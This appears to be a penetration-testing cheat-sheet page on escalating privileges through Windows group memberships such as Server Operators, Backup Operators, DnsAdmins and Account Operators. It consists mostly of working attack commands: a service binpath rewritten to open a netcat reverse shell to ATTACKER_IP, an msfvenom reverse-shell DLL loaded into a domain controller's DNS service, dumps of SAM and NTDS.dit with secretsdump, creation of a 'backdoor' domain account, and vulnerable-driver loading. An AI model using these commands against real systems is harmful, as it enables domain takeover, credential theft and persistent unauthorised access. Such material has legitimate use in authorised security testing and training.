> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Privileged Groups

> Privilege escalation via Windows group memberships: Server Operators, Backup Operators, DnsAdmins, Account Operators, and more.

## Check Groups

```cmd theme={"dark"}
whoami /groups
net localgroup
net group /domain
```

***

## Server Operators

Can modify/manage services and back up/restore files (SeBackupPrivilege/SeRestorePrivilege). Note: Server Operators do **not** have SeLoadDriverPrivilege by default — driver loading belongs to Print Operators.

### Exploit — Modify Service

```cmd theme={"dark"}
sc config VMTools binpath= "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
sc stop VMTools
sc start VMTools
```

Any service the group can manage works. Common targets:

```cmd theme={"dark"}
sc qc AppReadiness
sc qc VMTools
sc qc browser
```

***

## Backup Operators

SeBackupPrivilege + SeRestorePrivilege. Read/write any file.

### Dump SAM & SYSTEM

```cmd theme={"dark"}
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY
```

### Dump NTDS.dit (Domain Controller)

```
diskshadow.exe

set context persistent nowriters
add volume C: alias myvolume
create
expose %myvolume% Z:
```

```cmd theme={"dark"}
robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit
```

Extract:

```bash theme={"dark"}
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
```

### Read Any File

```cmd theme={"dark"}
robocopy /B C:\Users\Administrator\Desktop C:\Temp confidential.txt
```

See also [SeBackupPrivilege](/windows-privesc/sebackup) for more techniques.

***

## DnsAdmins

Members can load arbitrary DLL into DNS service (runs as SYSTEM on DC).

### Create Malicious DLL

```bash theme={"dark"}
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll
```

### Host on SMB

```bash theme={"dark"}
impacket-smbserver share . -smb2support
```

### Load DLL into DNS

```cmd theme={"dark"}
dnscmd DC01 /config /serverlevelplugindll \\ATTACKER_IP\share\evil.dll
```

### Restart DNS Service

```cmd theme={"dark"}
sc \\DC01 stop dns
sc \\DC01 start dns
```

### Cleanup

```cmd theme={"dark"}
dnscmd DC01 /config /serverlevelplugindll ""
```

<Warning>
  Restarting DNS on a domain controller can cause outages. Coordinate with client in real engagements.
</Warning>

***

## Account Operators

Can create/modify users and groups (except Domain Admins, Administrators).

### Add User to Domain

```cmd theme={"dark"}
net user backdoor P@ssw0rd /add /domain
net group "Remote Desktop Users" backdoor /add /domain
```

### Modify Existing User

```cmd theme={"dark"}
net user targetuser NewP@ss123! /domain
```

### Modify Group Membership

```cmd theme={"dark"}
net group "Exchange Windows Permissions" backdoor /add /domain
```

Then abuse Exchange permissions for DCSync.

***

## Print Operators

Can load drivers and manage printers. SeLoadDriverPrivilege.

### Load Vulnerable Driver

```cmd theme={"dark"}
# Capcom.sys
LoadDriver.exe System\CurrentControlSet\Capcom C:\Temp\Capcom.sys
ExploitCapcom.exe
```

See [SeLoadDriverPrivilege](/windows-privesc/seloaddriver).

***

## Remote Desktop Users

RDP access to machine.

```bash theme={"dark"}
xfreerdp3 /v:TARGET /u:user /p:password /cert:ignore
```

Once in, check local privesc vectors.

***

## Remote Management Users

WinRM access.

```bash theme={"dark"}
evil-winrm -i TARGET -u user -p password
```

***

## Hyper-V Administrators

Full control over Hyper-V VMs. Can clone DC virtual disk.

```powershell theme={"dark"}
# Clone VM disk
Copy-Item "C:\VMs\DC01\disk.vhdx" C:\Temp\
# Mount and extract NTDS.dit + SYSTEM
```

***

## Event Log Readers

Read security event logs. Can find credentials in logs.

```powershell theme={"dark"}
Get-WinEvent -LogName Security | Where-Object { $_.Message -match "password|credential" }
```

```cmd theme={"dark"}
wevtutil qe Security /c:50 /f:text | findstr /i "password"
```

***

## Quick Reference

| Group                  | Impact | Technique               |
| ---------------------- | ------ | ----------------------- |
| Server Operators       | SYSTEM | Modify service binpath  |
| Backup Operators       | SYSTEM | Dump SAM/NTDS.dit       |
| DnsAdmins              | SYSTEM | Load DLL in DNS service |
| Account Operators      | Domain | Create/modify users     |
| Print Operators        | SYSTEM | Load kernel driver      |
| Hyper-V Administrators | Domain | Clone DC virtual disk   |
| Event Log Readers      | Creds  | Read security logs      |
